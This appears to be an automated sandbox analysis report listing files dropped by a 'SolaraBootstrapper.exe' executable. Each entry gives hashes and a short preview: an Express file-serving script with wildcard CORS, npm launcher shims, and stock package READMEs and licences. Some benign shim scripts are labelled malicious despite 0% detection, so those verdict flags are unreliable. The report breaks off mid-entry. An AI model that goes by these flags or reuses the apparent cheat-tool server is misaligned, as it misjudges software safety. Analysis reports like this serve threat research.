                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....C..........." ..0.............R.... ........... ...............................o....`.....................................O........................'..........(...8............................................ ............... ..H............text...X.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................1.......H.......4B..4X..........h...@.............................................(....*F.~....(....tV...*6.~.....(....*F.~....(....tV...*6.~.....(....*F.~....(....tV...*6.~.....(....*F.~....(....tV...*6.~.....(....*F.~....(.........*J.~..........(....*F.~....(....tV...*6.~.....(....*F.~....(.........*J.~..........(....*F.~....(....tV...*6.~.....(....*6.t.....}....*.0..r........{....-Y.(....-..(....-..(....-..(....,9.(.....(.......s.......(......&....(.....(.....(....}.....{....%-.&.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4536
                                                  Entropy (8bit):4.741460539247671
                                                  Encrypted:false
                                                  SSDEEP:96:gFEuLu1uHsWwXphsk/9TLsvyOsSnWX+OsM+3qYsMxiT9:4EMej/ZuyEnWv+FK
                                                  MD5:E462FB7561F6C9BCCB24E62BB93889D2
                                                  SHA1:1BECCA75907B3AE5FB7DE82E0CB495FF0FC90517
                                                  SHA-256:FF3FC42D5F912950D1095C43C8EDB8A3BE63C8EEE9DB5CA5D39D5668F68F7B41
                                                  SHA-512:4E7E83E63195AD0D9D155E3D00E0DC228148C95804D817779A043ABE3672087FDC9E038EDE8F6510FC88CC283E3D993499CAFA8083E5104CCF0360DF845ACB26
                                                  Malicious:false
                                                  Preview:const express = require('express');..const fs = require('fs');..const path = require('path');..const bodyParser = require('body-parser');....const app = express();..const port = 9911;....app.use((req, res, next) => {.. res.header('Access-Control-Allow-Origin', '*');.. res.header('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');.. res.header('Access-Control-Allow-Headers', 'Content-Type');.... const userAgent = req.get('User-Agent');.. if (userAgent && userAgent.includes('Roblox')) {.. return res.status(403).send('Access denied');.. }.... next();..});....app.get('/files', async (req, res) => {.. const directoryPath = 'C:\\SolaraTab';.. const userAgent = req.get('User-Agent');.. if (userAgent && userAgent.includes('Roblox')) {.. return res.status(403).send('Access denied');.. }.... try {.. .. const fileNames = await fs.promises.readdir(directoryPath);.. .. const filePromises = fileNames.map(async (fileNam
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:POSIX shell script, ASCII text executable
                                                  Category:dropped
                                                  Size (bytes):371
                                                  Entropy (8bit):4.910785755010633
                                                  Encrypted:false
                                                  SSDEEP:6:hfSc7IMVSCCGuyLk5tRZrCbIiMxsaWGrG5N2Hx4HWwzR9mtkPec7e2vn:ZZUpBGultRwbS7SL2m90TIn
                                                  MD5:7AB5BFFF58B0A878A4614CDDBE424702
                                                  SHA1:E75AD406EF2F9FCB1A9BDE44BA669F416C824C4F
                                                  SHA-256:394B93EAAAC25F18A20D7CDD80920ECCA1FE43C8E5B37501389E644944C6E01F
                                                  SHA-512:36F59FB7F2A1F985210CE39FB90E6E7998E4BA8030F172496EDA22A12C66B58C651211D0F682C2B0EC58A6E1AE19D59380D1FE0C6849F15FCF381DF60123AAEB
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:#!/bin/sh.basedir=$(dirname "$(echo "$0" | sed -e 's,\\,/,g')")..case `uname` in. *CYGWIN*|*MINGW*|*MSYS*). if command -v cygpath > /dev/null 2>&1; then. basedir=`cygpath -w "$basedir"`. fi. ;;.esac..if [ -x "$basedir/node" ]; then. exec "$basedir/node" "$basedir/../mime/cli.js" "$@".else . exec node "$basedir/../mime/cli.js" "$@".fi.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):316
                                                  Entropy (8bit):5.2931488574549075
                                                  Encrypted:false
                                                  SSDEEP:6:/EiwLynvuc3Kp2h9JaJWgbQBvJplsMgbi9xHxcdyfV9jqRB+YyAnYIIky:/lwOnvMw9Ja5QplOiSdwV9jqsiq5
                                                  MD5:2872347AC99221152281BFD56705D437
                                                  SHA1:83FA66CD05F64DE1EF7F3010344A0F7BABE54819
                                                  SHA-256:CD5CA2F059E780C0A4B1AA9CDD6EDC7DC10413D30BF51AD537ADBD428E5E7A16
                                                  SHA-512:3C0B9E12BC1FF8F2BBAA5301D8DB78A5C3636DD93F5755728E5B255C4250C0EA9E3C53A545011087B9C2536B1C1676FF01F7EFF3015E6E99F2E12C9F15386FE5
                                                  Malicious:false
                                                  Preview:@ECHO off..GOTO start..:find_dp0..SET dp0=%~dp0..EXIT /b..:start..SETLOCAL..CALL :find_dp0....IF EXIST "%dp0%\node.exe" (.. SET "_prog=%dp0%\node.exe"..) ELSE (.. SET "_prog=node".. SET PATHEXT=%PATHEXT:;.JS;=;%..)....endLocal & goto #_undefined_# 2>NUL || title %COMSPEC% & "%_prog%" "%dp0%\..\mime\cli.js" %*..
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:a /usr/bin/env pwsh script, ASCII text executable
                                                  Category:dropped
                                                  Size (bytes):769
                                                  Entropy (8bit):4.981782287433566
                                                  Encrypted:false
                                                  SSDEEP:12:Hsa0aBXj2Uu6Dqb+RTqeNFmZC0/vq8dP2JNUJCCm0BC0/vq8dP5NTCCmG6:UarDq0uqFl0nn4Nm1hE0nnRNT1v6
                                                  MD5:BEF04ABF08E89532A476C3E474B5F509
                                                  SHA1:BB81073D8E07C483EE29121358871535973336E7
                                                  SHA-256:A43D8B7D57DBBB21F2F98C331970D011177FA1C6BE327AA0DBB84C1AD01E9201
                                                  SHA-512:E20F86C40CE523477DA136CB4AA3F29683DEE567A31EBFAD666666192417F49568E848CB8844E8DCD32D5501FB7176D47ACA54C195324E6D41E73093699788B1
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:#!/usr/bin/env pwsh.$basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent..$exe="".if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) {. # Fix case when both the Windows and Linux builds of Node. # are installed in the same directory. $exe=".exe".}.$ret=0.if (Test-Path "$basedir/node$exe") {. # Support pipeline input. if ($MyInvocation.ExpectingInput) {. $input | & "$basedir/node$exe" "$basedir/../mime/cli.js" $args. } else {. & "$basedir/node$exe" "$basedir/../mime/cli.js" $args. }. $ret=$LASTEXITCODE.} else {. # Support pipeline input. if ($MyInvocation.ExpectingInput) {. $input | & "node$exe" "$basedir/../mime/cli.js" $args. } else {. & "node$exe" "$basedir/../mime/cli.js" $args. }. $ret=$LASTEXITCODE.}.exit $ret.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):25264
                                                  Entropy (8bit):5.2516551877991695
                                                  Encrypted:false
                                                  SSDEEP:384:gVbqQ3uaG5ur6UDR5Gf3QB78K/wR8Cv8mCHL2mW:gQQUurhdUaO8CveXW
                                                  MD5:E35FCE819EB584DF48CF52E97690CB3F
                                                  SHA1:9D2E90D3F5057690C11911BB41D6303FD0EF5E8B
                                                  SHA-256:98AA53C0FAFA3457D59F459BCE5770B68451DBCD64A9834F1A05DBA2D98F3697
                                                  SHA-512:A75F9448CC2353BCEDD2718A372B83C0721C1A9057CA365CA11DAD072A09D0DC7EC0BB8A69FA9322E127A52658C42EBE28B5EF4164436259AF3D3734026E06F6
                                                  Malicious:false
                                                  Preview:{. "name": "fileaccess",. "lockfileVersion": 3,. "requires": true,. "packages": {. "node_modules/accepts": {. "version": "1.3.8",. "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz",. "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==",. "dependencies": {. "mime-types": "~2.1.34",. "negotiator": "0.6.3". },. "engines": {. "node": ">= 0.6". }. },. "node_modules/array-flatten": {. "version": "1.1.1",. "resolved": "https://registry.npmjs.org/array-flatten/-/array-flatten-1.1.1.tgz",. "integrity": "sha512-PCVAQswWemu6UdxsDFFX/+gVeYqKAod3D3UVm91jHwynguOwAvYPhx8nNlM++NqRcK6CxxpUafjmhIdKiHibqg==". },. "node_modules/body-parser": {. "version": "1.20.2",. "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.20.2.tgz",. "integrity": "sha512-ml9pReCu3M61kGlqoTm2umSXTlRTuGTx0bfYj+uIUKKYycG5NtSbeetV3faSU6
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5096
                                                  Entropy (8bit):4.7356362263734955
                                                  Encrypted:false
                                                  SSDEEP:96:se/lRUzCazCZ88Yzi0wWtbIRySLH8dzKCwNOJrI+QUVsWm:hcNi8YwdDFC
                                                  MD5:5577813327E7B93A2E3AED18F3E2833C
                                                  SHA1:58BE8678425511C7CFA60E0EE0F009740EAA4616
                                                  SHA-256:EF66FE7E96FEE5760F153FC5059124EFFA5310895B336585E3A80A93C9F2D9BE
                                                  SHA-512:4318E9D590CE10CF62A5218ADCA86C0FDE7EB6AFB49212BA6085F9D6BD9BEE85294E4E1B1B00A8B80D51771AAFD975CB43CE02A8A2D9463D19A47B64336F9078
                                                  Malicious:false
                                                  Preview:1.3.8 / 2022-02-02.==================.. * deps: mime-types@~2.1.34. - deps: mime-db@~1.51.0. * deps: negotiator@0.6.3..1.3.7 / 2019-04-29.==================.. * deps: negotiator@0.6.2. - Fix sorting charset, encoding, and language with extra parameters..1.3.6 / 2019-04-28.==================.. * deps: mime-types@~2.1.24. - deps: mime-db@~1.40.0..1.3.5 / 2018-02-28.==================.. * deps: mime-types@~2.1.18. - deps: mime-db@~1.33.0..1.3.4 / 2017-08-22.==================.. * deps: mime-types@~2.1.16. - deps: mime-db@~1.29.0..1.3.3 / 2016-05-02.==================.. * deps: mime-types@~2.1.11. - deps: mime-db@~1.23.0. * deps: negotiator@0.6.1. - perf: improve `Accept` parsing speed. - perf: improve `Accept-Charset` parsing speed. - perf: improve `Accept-Encoding` parsing speed. - perf: improve `Accept-Language` parsing speed..1.3.2 / 2016-03-08.==================.. * deps: mime-types@~2.1.10. - Fix extension of `application/dash+xml`. - Upda
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1167
                                                  Entropy (8bit):5.176199836532222
                                                  Encrypted:false
                                                  SSDEEP:24:voiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:voiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:BF1F9AD1E2E1D507AEF4883FFF7103DE
                                                  SHA1:F027AF3E61AF3880FD7F7B8BA9452A85DD215738
                                                  SHA-256:71F83C4C0621102A56D9853812777B85751BCE7E9726F686F5B056C1F8A4B0E6
                                                  SHA-512:A1A293EB0097FE87875F3BF908CC0B0EE8F15E995C68E984B6A24E247B2E954407D7941EA96ABD7FE002A1BDFB713FDFB0D3839D948A334603F05E644829F606
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4123
                                                  Entropy (8bit):4.91326314825233
                                                  Encrypted:false
                                                  SSDEEP:48:ZdC9AIvI6RZK0nwuBGWxGWwsNdXMoNjP601Wrk0aN8F07DaN89JC7aN8fBfuRhpL:/CnQl0JZ15jue/9IQxokXjwiA0
                                                  MD5:873E624D40D23CF9B54F9D2F74D2C8D1
                                                  SHA1:3A884510D2EEED73A4CD5AE0947A6C72CD3C7426
                                                  SHA-256:C25A1071E5AA1B1B43E10F083E8D97C3DBF1F7700CFA38B5CBC40725662E1AE0
                                                  SHA-512:A929EDEB59EDC6F1EF4F7554DDFD0B1B54AA097D4FDF69C5EC25B14C3C722A034D159DAF3AD38508EFC775FDF8C246507D53021E4AD79F0708C5DF94B311A864
                                                  Malicious:false
                                                  Preview:# accepts..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-version-image]][node-version-url].[![Build Status][github-actions-ci-image]][github-actions-ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Higher level content negotiation based on [negotiator](https://www.npmjs.com/package/negotiator)..Extracted from [koa](https://www.npmjs.com/package/koa) for general use...In addition to negotiator, it allows:..- Allows types as an array or arguments list, ie `(['text/html', 'application/json'])`. as well as `('text/html', 'application/json')`..- Allows type shorthands such as `json`..- Returns `false` when no types match.- Treats non-existent headers as `*`..## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-local
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5252
                                                  Entropy (8bit):4.893026178912312
                                                  Encrypted:false
                                                  SSDEEP:96:oYG1MGmGHqyl8rAyBkmqFxo+uerpDWMlB8fdOGUJTit4UG9bCZhPwA:oYG1Xlqyl88yBD+uerRLD0YQ4rcZh9
                                                  MD5:4FE4D2C90A2FD19D6E97443A7D24F815
                                                  SHA1:282263F45F6BF80FBF43F4097D53B5B60FF1A05F
                                                  SHA-256:BE2DECBD50610E8F995C1E312EE4DD6D7C1244CFDF03EE4C4A3DA68E572DADA1
                                                  SHA-512:C795B7285CC92616A46FD1AD2D00CE65FB4B269E6B6FC35315891D119B7C25B7F4573540BE0627D577123201D9CFE119C8A53F0E75A8B6EA870F8D89A130C213
                                                  Malicious:false
                                                  Preview:/*!. * accepts. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var Negotiator = require('negotiator').var mime = require('mime-types')../**. * Module exports.. * @public. */..module.exports = Accepts../**. * Create a new Accepts object for the given req.. *. * @param {object} req. * @public. */..function Accepts (req) {. if (!(this instanceof Accepts)) {. return new Accepts(req). }.. this.headers = req.headers. this.negotiator = new Negotiator(req).}../**. * Check if the given `type(s)` is acceptable, returning. * the best match when true, otherwise `undefined`, in which. * case you should respond with 406 "Not Acceptable".. *. * The `type` value may be a single mime type string. * such as "application/json", the extension name. * such as "json" or an array `["json", "html", "text/plain"]`. When a list. * or array is given the _best_ match, if any is returned.. *. *
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1157
                                                  Entropy (8bit):4.764840639838503
                                                  Encrypted:false
                                                  SSDEEP:24:yH1FBxVWbeXNnuNCHRIZCLlWeq9B0xLVG:yVFXVWbednuNCHRIQUr/0xA
                                                  MD5:32A15D6909FCAE63E52D8664593D32D5
                                                  SHA1:131BA4D63747E6663A9C19409E43AC034BD532CF
                                                  SHA-256:E5716D5D939DB08C5C28EC6AE86ED67BE5320F91089E2673FCA1C5B876E57AA3
                                                  SHA-512:6F0E9FE3D034640B8B2F902A5E336B39D818CEC504A9C52767F5F08D71BB1903B182771625C110F768A8CC540B071A54AFB7810270A09F4EDFE5E35DBA22FE37
                                                  Malicious:false
                                                  Preview:{. "name": "accepts",. "description": "Higher-level content negotiation",. "version": "1.3.8",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "license": "MIT",. "repository": "jshttp/accepts",. "dependencies": {. "mime-types": "~2.1.34",. "negotiator": "0.6.3". },. "devDependencies": {. "deep-equal": "1.0.1",. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "4.3.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.0",. "nyc": "15.1.0". },. "files": [. "LICENSE",. "HISTORY.md",. "index.js". ],. "engines": {. "node": ">= 0.6". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --check-leaks --bail test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm te
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1103
                                                  Entropy (8bit):5.13317512688003
                                                  Encrypted:false
                                                  SSDEEP:24:bNtrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bNtaJHlxE35QHOs5exm3ogF5n
                                                  MD5:44088BA57CB871A58ADD36CE51B8DE08
                                                  SHA1:3A7F886B632D2197676A40020D354E84B7860604
                                                  SHA-256:4EEB3271453A891DF609E5A9F4EE79A68307F730C13417A3BFEFFA604AC8CF25
                                                  SHA-512:6D8B9708BFA1F3CFA2B63F90152CB6F26960C2BA54FA11A16C13E1D5A3F85F4121516699025B6B759E051B276509B1D69510B644241434E6F8F81B3DFA5A8E63
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2014 Blake Embrey (hello@blakeembrey.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1245
                                                  Entropy (8bit):5.127650590620066
                                                  Encrypted:false
                                                  SSDEEP:24:E+q3S7Rm3omV60J5Z9ZIH1ZmIzrxvMohI4XFHOqW6mxw+N+k:/q38R7wnZ9ZIH1Zdaq7mqA/
                                                  MD5:328FDAF1EE65869341567F4FB6716E02
                                                  SHA1:98EFA9E4BD6D6BCA4EBB76991A2187A8A496C8B6
                                                  SHA-256:071DD896356DA12269508F361958EC622E47B27A96D7EFDBA23B671BC3470416
                                                  SHA-512:40378EEEB21474E8BE2962853B1D279AB8E167E68EBAD08AE4E7932C131DA317672852916BCC1000EC43A0163653C45158A9A8BE819B4A6479163AC8C5391CA5
                                                  Malicious:false
                                                  Preview:# Array Flatten..[![NPM version][npm-image]][npm-url].[![NPM downloads][downloads-image]][downloads-url].[![Build status][travis-image]][travis-url].[![Test coverage][coveralls-image]][coveralls-url]..> Flatten an array of nested arrays into a single flat array. Accepts an optional depth...## Installation..```.npm install array-flatten --save.```..## Usage..```javascript.var flatten = require('array-flatten')..flatten([1, [2, [3, [4, [5], 6], 7], 8], 9]).//=> [1, 2, 3, 4, 5, 6, 7, 8, 9]..flatten([1, [2, [3, [4, [5], 6], 7], 8], 9], 2).//=> [1, 2, 3, [4, [5], 6], 7, 8, 9]..(function () {. flatten(arguments) //=> [1, 2, 3].})(1, [2, 3]).```..## License..MIT..[npm-image]: https://img.shields.io/npm/v/array-flatten.svg?style=flat.[npm-url]: https://npmjs.org/package/array-flatten.[downloads-image]: https://img.shields.io/npm/dm/array-flatten.svg?style=flat.[downloads-url]: https://npmjs.org/package/array-flatten.[travis-image]: https://img.shields.io/travis/blakeembrey/array-flatten.svg?s
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1195
                                                  Entropy (8bit):4.593208401290555
                                                  Encrypted:false
                                                  SSDEEP:24:GQQBqdOu0rErWuyeIMvR67dCSbUgMMfmO0rEg2r:GQQUiordyeIMvR+ggMMfAog2r
                                                  MD5:4B17FA06C54846B686B8B799E9DD253A
                                                  SHA1:FC6CC30E8B8EC09EEBA62BAC076ED627AA3EE8D1
                                                  SHA-256:766CA145B6D25E3D60F352A716E8FA1876BCDF362C0767C360CF24F335BC281E
                                                  SHA-512:72DF1668F464F6942C484155B667086BB6F83F77E826FFCD146EE045079DB3334ABA270BFFB66CDD796D4C9308121EC2A67A404289F19914C45D9A6C15435E71
                                                  Malicious:false
                                                  Preview:'use strict'../**. * Expose `arrayFlatten`.. */.module.exports = arrayFlatten../**. * Recursive flatten function with depth.. *. * @param {Array} array. * @param {Array} result. * @param {Number} depth. * @return {Array}. */.function flattenWithDepth (array, result, depth) {. for (var i = 0; i < array.length; i++) {. var value = array[i].. if (depth > 0 && Array.isArray(value)) {. flattenWithDepth(value, result, depth - 1). } else {. result.push(value). }. }.. return result.}../**. * Recursive flatten function. Omitting depth is slightly faster.. *. * @param {Array} array. * @param {Array} result. * @return {Array}. */.function flattenForever (array, result) {. for (var i = 0; i < array.length; i++) {. var value = array[i].. if (Array.isArray(value)) {. flattenForever(value, result). } else {. result.push(value). }. }.. return result.}../**. * Flatten an array, with the ability to define a depth.. *. * @param {Array} array. * @
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):4.681228780713186
                                                  Encrypted:false
                                                  SSDEEP:12:xXr1i1Dqly283i24JV//GnObmF2sbOj8RJuj3PzS+bHdq1clPsOhs6CU3wWanr:1r1iFYdS0/YCWIrSSE6XC1War
                                                  MD5:CB1AA7F817100A03395DD0163BF6EBE9
                                                  SHA1:FC51B89D0FB7CC640A0495BAA4005364E83718C3
                                                  SHA-256:5C5E0E10CFA23F163D1FE68AA57A881D09CAC39D720E1361C697B86C4D33E0F5
                                                  SHA-512:81FFEE7B54B11B42AAEEAF1B6FB13AC64E8900E94FFD249FE075C183C3ADF8E8451529D82F6A13216C73E5D1A1F57D703D9FCF1E61674020D93B15066D37DC75
                                                  Malicious:false
                                                  Preview:{. "name": "array-flatten",. "version": "1.1.1",. "description": "Flatten an array of nested arrays into a single flat array",. "main": "array-flatten.js",. "files": [. "array-flatten.js",. "LICENSE". ],. "scripts": {. "test": "istanbul cover _mocha -- -R spec". },. "repository": {. "type": "git",. "url": "git://github.com/blakeembrey/array-flatten.git". },. "keywords": [. "array",. "flatten",. "arguments",. "depth". ],. "author": {. "name": "Blake Embrey",. "email": "hello@blakeembrey.com",. "url": "http://blakeembrey.me". },. "license": "MIT",. "bugs": {. "url": "https://github.com/blakeembrey/array-flatten/issues". },. "homepage": "https://github.com/blakeembrey/array-flatten",. "devDependencies": {. "istanbul": "^0.3.13",. "mocha": "^2.2.4",. "pre-commit": "^1.0.7",. "standard": "^3.7.3". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):16491
                                                  Entropy (8bit):4.906122072590963
                                                  Encrypted:false
                                                  SSDEEP:192:hLe1CTDXdB88EQizOhoY3lxMNqRWY39GzBAhL/7AcG6y+GoFpN8E:ha1CTDXdB5hr3lWgxsFA97Z7FpN8E
                                                  MD5:94E1766ABF915C225DEB8E3B0FCA3EA8
                                                  SHA1:F243DA6E908C86D71C1C2C29C633165742F2ACC3
                                                  SHA-256:78FB65863EA5E13764FD0F68815B5F3DB3CACF46CFD2D6958D2D1770FC138F01
                                                  SHA-512:F70A796430CBF5CC271D9394968FB591FC546184E3735E7996825C216890C0A64A391BA694A73D8DB94996651F2E103F9E2FEB4E6EB562BFD373220E8A7C4788
                                                  Malicious:false
                                                  Preview:1.20.2 / 2023-02-21.===================.. * Fix strict json error message on Node.js 19+. * deps: content-type@~1.0.5. - perf: skip value escaping when unnecessary. * deps: raw-body@2.5.2..1.20.1 / 2022-10-06.===================.. * deps: qs@6.11.0. * perf: remove unnecessary object clone..1.20.0 / 2022-04-02.===================.. * Fix error message for json parse whitespace in `strict`. * Fix internal error when inflated body exceeds limit. * Prevent loss of async hooks context. * Prevent hanging when request already read. * deps: depd@2.0.0. - Replace internal `eval` usage with `Function` constructor. - Use instance methods on `process` to check for listeners. * deps: http-errors@2.0.0. - deps: depd@2.0.0. - deps: statuses@2.0.1. * deps: on-finished@2.4.1. * deps: qs@6.10.3. * deps: raw-body@2.5.1. - deps: http-errors@2.0.0..1.19.2 / 2022-02-15.===================.. * deps: bytes@3.1.2. * deps: qs@6.9.7. * Fix handling of `__proto__` keys. * dep
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1172
                                                  Entropy (8bit):5.194993512942844
                                                  Encrypted:false
                                                  SSDEEP:24:vSiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:vSiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:0AFD201E48C7D095454EED4AC1184E40
                                                  SHA1:6A4ED3B5E9CFF68AF7593DFCB8BE3C1CBEA837D0
                                                  SHA-256:23D466B1B134B415B66FA50C6526B4CF3E7B9258554DA88D3ABB371721E7CE68
                                                  SHA-512:EBC137C01C13DA9D90FD411729B10CB15E6B7EA3F31A6B9DD23D0A769AEFE61CBEA7368C36698B0D562E85DCA08EBCAA59996F9653295A1C79252CBA3DA3D3AD
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2014-2015 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):18182
                                                  Entropy (8bit):4.801523094628893
                                                  Encrypted:false
                                                  SSDEEP:192:eBmKv7ygazeyidkShRvtlgem3x1A6H9wSu9kYPaDpIQVf3X/R0yV2aaX2JC/vuZA:xKFO4d/63TA6H9i9bSDKqvXpqmC
                                                  MD5:3152126CD7D54EDE5697046E69A7E589
                                                  SHA1:3C8820C682CC2E043465D9AAFBE1E182571E941F
                                                  SHA-256:1A8C31593D425887DF10E400A765D3F86F3B195B4EFDCCD44FF4AA542C03380B
                                                  SHA-512:73B3C1FA28E96F744E7E6A58A13D6C5B31646CF06FE47895C226ED61198C5C2BCD4A2DC0C4447DE54EA15D5D56D7E330AD1335B3659598CC576A88E791C16358
                                                  Malicious:false
                                                  Preview:# body-parser..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Node.js body parsing middleware...Parse incoming request bodies in a middleware before your handlers, available.under the `req.body` property...**Note** As `req.body`'s shape is based on user-controlled input, all.properties and values in this object are untrusted and should be validated.before trusting. For example, `req.body.foo.toString()` may fail in multiple.ways, for example the `foo` property may not be there or may not be a string,.and `toString` may not be a function and instead a string or other user input...[Learn about the anatomy of an HTTP transaction in Node.js](https://nodejs.org/en/docs/guides/anatomy-of-an-http-transaction/)..._This does not handle multipart bodies_, due to their complex and typically.large nature. For multipart bodies, you may be interested in the following
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1193
                                                  Entropy (8bit):4.490786258962321
                                                  Encrypted:false
